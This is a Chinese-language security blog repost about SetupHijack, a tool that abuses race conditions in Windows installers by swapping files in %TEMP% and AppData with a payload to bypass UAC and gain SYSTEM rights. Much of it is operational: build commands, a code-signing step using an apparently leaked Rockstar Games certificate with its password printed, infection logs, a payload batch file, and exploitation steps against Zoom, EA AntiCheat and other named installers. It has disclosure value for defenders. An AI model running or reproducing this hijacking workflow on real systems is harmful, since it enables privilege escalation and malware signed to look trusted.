文章总结: SetupHijack是一款利用Windows安装程序竞态条件的提权工具,无需权限即可绕过UAC。它监控%TEMP%目录并替换特权进程释放的安装文件,使恶意载荷以SYSTEM权限执行。文章分析了Zoom、EA反作弊等受影响软件,揭示了安装程序信任模型漏洞,适用于红队与安全研究。 综合评分: 88 文章分类: 红队,渗透测试,漏洞分析,免杀,安全工具
SetupHijack 是一款研究工具,它利用 Windows 安装程序中的竞争条件来绕过 UAC,并在没有提升权限的情况下获得管理员权限
Ots安全
2026年1月8日 13:01 广东
威胁简报
恶意软件
漏洞攻击
概述
SetupHijack是一款安全研究工具,它利用 Windows 安装程序和更新程序中的竞争条件和不安全的文件处理机制。该工具针对的是特权安装程序或更新程序将文件放置在%TEMP%全局可写位置的情况,攻击者可以利用这些文件在程序以提升的权限执行之前被替换。
- 无需提升权限即可运行。
- 不使用文件系统通知(而是轮询更改)。
- 利用 Authenticode 代码签名和安装程序信任模型中的漏洞。
- 可以感染.exe、、.msi和批处理文件(例如sysinfo,、、netstat)ipconfig。
- 仅供红队、渗透测试和安全研究使用。
该工具的预期用途是在具有权限的被入侵用户帐户的后台运行,以便通过劫持安装程序/更新程序文件投放来提升另一个进程的权限。
下图展示了该漏洞在多种场景下的实际应用示例,可用于绕过用户帐户控制 (UAC)。在无管理员权限环境下运行时,UAC 绕过被视为安全边界,也是攻击者禁用安全控制的常见“必要条件”。利用管理员特权操作,恶意代码可以通用地访问漏洞,从而侧载或提升进程权限。该工具可用于识别面临相同风险的其他应用程序,攻击者可以等待这些进程执行,以此在不干扰用户行为的情况下获取提升的权限。
工作原理
- SetupHijack会持续扫描%TEMP%(及其子目录)以查找新的或修改过的安装程序文件。
- 当检测到目标文件时,它会被用户提供的有效载荷(EXE、MSI 或 BAT)替换,并可选择保留原始文件.bak。
- 如果特权进程在完整性检查之前执行被替换的文件,则有效载荷将以提升的权限(例如,SYSTEM 或 Administrator)运行。
- 该工具会记录所有操作,并维护一个跳过列表,以避免对相同的文件进行重复感染。
代码签名说明
本项目使用经过破解的代码签名流程,利用SignToolEx.exe 和 SignToolExHook.dll
- https://github.com/hackerhouse-opensource/SignToolEx
对有效载荷和安装程序进行签名。使用有效的代码签名证书和 Authenticode 时间戳可以提高绕过安装程序和操作系统信任检查的成功率。
示例输出
以下是构建和运行 SetupHijack 的真实示例,包括代码签名和感染输出:
C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"
Microsoft (R) Program Maintenance Utility Version 14.29.30159.0
Copyright (C) Microsoft Corporation. All rights reserved.
powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp
SetupHijack.cpp
SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced
taskkill /f /im SetupHijack.exe2>nul
powershell -Command "Start-Sleep -Milliseconds 500"
link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest
copy /y install.wxs.template install.wxs
1file(s) copied.
powershell -Command "(Get-Content install.wxs) -replace 'Source=\"PAYLOAD_PLACEHOLDER\"', 'Source=\"%ESCAPED_PAYLOAD%\"' | Set-Content install.wxs"
wix build install.wxs -o install.msi
Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe
Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe
powershell -Command "(Get-Content install.wxs) -replace '(<File Id=\"RengeExeFile\" Source=\").*?(\" KeyPath=\"yes\"/>)', '`%ESCAPED_PAYLOAD%`' | Set-Content install.wxs"
call sign_random.bat
Using CERT: [certs\rockstar1.pfx]
Using PASS: [C!EZxYUxVGPzQDj3]
The following certificate was selected:
Issued to: Rockstar Games, Inc.
Issued by: Entrust Code Signing CA - OVCS1
Expires: Thu Mar 2017:16:133000
SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6
Done Adding Additional Store
Successfully signed: SetupHijack.exe
Number of files successfully Signed: 1
Number of warnings:0
Number of errors:0
The following certificate was selected:
Issued to: Rockstar Games, Inc.
Issued by: Entrust Code Signing CA - OVCS1
Expires: Thu Mar 2017:16:133000
SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6
Done Adding Additional Store
Successfully signed: install.msi
Number of files successfully Signed: 1
Number of warnings:0
Number of errors:0
C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe
[2025-09-2415:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-2415:20:46] [SetupHijack] If infecting .msi, will use: install.msi
[2025-09-2415:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat:
[2025-09-2415:20:46] - C:\Users\FANTAS~1\AppData\Local\Temp
[2025-09-2415:20:46] - C:\Users\Fantastic\AppData\Roaming
[2025-09-2415:20:46] - C:\Users\Fantastic\Downloads
[2025-09-2415:20:46] [SetupHijack] Entering infection loop.
[2025-09-2415:20:59] [SetupHijack] Total infections this session: 0
[2025-09-2415:21:13] [SetupHijack] Replaced C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak
[2025-09-2415:21:13] [SetupHijack] New infections this run: 1
[2025-09-2415:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak
[2025-09-2415:21:26] [SetupHijack] New infections this run: 1
[2025-09-2415:21:26] [SetupHijack] Total infections this session: 2
[2025-09-2415:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak
[2025-09-2415:21:41] [SetupHijack] New infections this run: 1
[2025-09-2415:21:53] [SetupHijack] Total infections this session: 3
下面这张截图展示了 SetupHijack 的实际运行情况,它在特权安装程序运行时部署了一个植入程序:
已识别的漏洞
以下列举了一些“最佳情况”,这些情况包括运行不受信任的 .MSI 文件,导致权限被提升至“NT AUTHORITY\SYSTEM”。但许多“UAC 提升”进程通常会通过 .bat 文件运行。由于执行发生在同一个用户 SID 下(%TEMP% 是内部会话创建过程中在 %USERPROFILE% 下构建的用户 SID 的唯一标识),因此可以通过操纵继承父进程权限的 .bat 文件,在同一会话中提升至高完整性完整权限。“临时文件提升权限命令执行”是一种常见漏洞,可用于绕过 UAC 并在无管理员权限下执行操作,因为在安全桌面上提示用户时会显示被利用的应用程序(例如 Zoom 更新)。
Zoom 6.6.1 (15968) 使用 %AppData% 目录安装和更新 .exe 文件,这允许进程横向移动和进程欺骗(例如,通过 Zoom 更新发送权限提升请求)。可执行文件很容易被篡改,用于窃取凭据攻击和恶意目的。
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31][SetupHijack]Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exewithpayload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
- 运行 install.msi 时,msiexec.exe 在 NT AUTHORITY\SYSTEM 目录下执行。
- Wireshark 更新程序通过 %Temp% 目录运行,但未能成功。
- Visual Studio 代码签名检查可防止更新中的漏洞被利用(已进行轻度测试的 .VSIX 格式)。
- 德州仪器代码编辑器安装程序可被利用绕过UAC身份验证(2025年9月25日)。(ccs_setup_20.3.0.00014.exe)
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exewithpayloadc:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exewithpayloadc:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.batwithpayloadinstall.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exewithpayloadc:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.batwithpayloadinstall.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak
[2025-09-25 14:39:59][SetupHijack]Newinfectionsthisrun: 1
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exewithpayloadc:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.batwithpayloadinstall.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak
[2025-09-25 14:39:59][SetupHijack]Newinfectionsthisrun: 1
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exewithpayloadc:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak
[2025-09-25 14:39:59][SetupHijack]Newinfectionsthisrun: 1
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exewithpayloadc:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak
[2025-09-25 14:39:59][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exewithpayloadc:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS~1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak
[2025-09-25 14:39:59][SetupHijack]Newinfectionsthisrun: 2
[2025-09-25 14:39:59][SetupHijack]Newinfectionsthisrun: 5
[2025-09-25 14:40:02][SetupHijack]Totalinfectionsthissession: 13
[2025-09-25 14:40:29][SetupHijack]ReplacedC:\Users\FANTAS~1\AppData\Local\Temp\tmp1758829228.batwithpayloadinstall.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\tmp1758829228.bat.bak
[2025-09-25 14:40:29][SetupHijack]Newinfectionsthisrun: 1
- 已发现 Cursor IDE 会在 %TEMP% 中创建 .bat 文件和命令历史记录,这些文件和历史记录可被利用来向 Cursor 历史记录中注入命令,权限提升受限。
- JBL Quantum Engine 存在一个(现已修复的)命令注入漏洞,该漏洞会从 JBL_QuantumENGINE_1.11.0.1511_x64 所在的同一目录运行“net”(包括 .bat 文件)。最新版本使用了一个不受此特定命令注入漏洞影响的新安装程序 (JBL_QuantumENGINE_Installer_2.2.13_x64.exe)。此漏洞于 2022 年 11 月被发现,属于零日漏洞。它可用于绕过 UAC 限制并获得管理员权限。SYSTEM 服务会在 %TEMP% 目录下写入 bat 文件以进行调试/诊断。 😉
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
Volume in drive C has no label.
Volume Serial Number is 48EC-B703
Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day
11/20/2022 11:54 AM 139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
1 File(s) 139,327,096 bytes
0 Dir(s) 237,500,821,504 bytes free
- EA Sports 的“EA 反作弊安装程序”存在任意提升权限执行漏洞。EA 的游戏,例如“滑板”,会安装一个反作弊服务,该服务使用一个临时的、用户可写的位置。攻击者可以在 STEAM 安装过程中替换 EAAntiCheat.Installer.exe 文件,此时 STEAM 引擎会弹出 UAC 权限提升提示,并显示 Valve 的徽标和图标,但攻击者会以提升的权限执行攻击者编写的有效载荷 exe 文件。请参阅 EASkateUAC 的屏幕截图,了解如何利用此漏洞绕过(或混淆)UAC 权限。
Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate\__Installer\EAAntiCheat
09/29/202504:34 PM <DIR> .
09/29/202504:13 PM <DIR> ..
09/29/202504:31 PM 166,999,232 EAAntiCheat.Installer.exe
1 File(s) 166,999,232 bytes
2 Dir(s) 161,991,856,128 bytes free
C:\Program Files (x86)\Steam\steamapps\common\Skate\__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe
C:\Program Files (x86)\Steam\steamapps\common\Skate\__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
WIN11LAB\Fantastic:(ID)F
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
C:\Program Files (x86)\Steam\steamapps\common\Skate\__Installer\EAAntiCheat>copyc:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe
Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A
1file(s) copied.
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
排版 编辑 | Ots 小安
采集 翻译 | Ots Ai牛马
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《SetupHijack 是一款研究工具,它利用 Windows 安装程序中的竞争条件来绕过 UAC,并在没有提升权限的情况下获得管理员权限》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论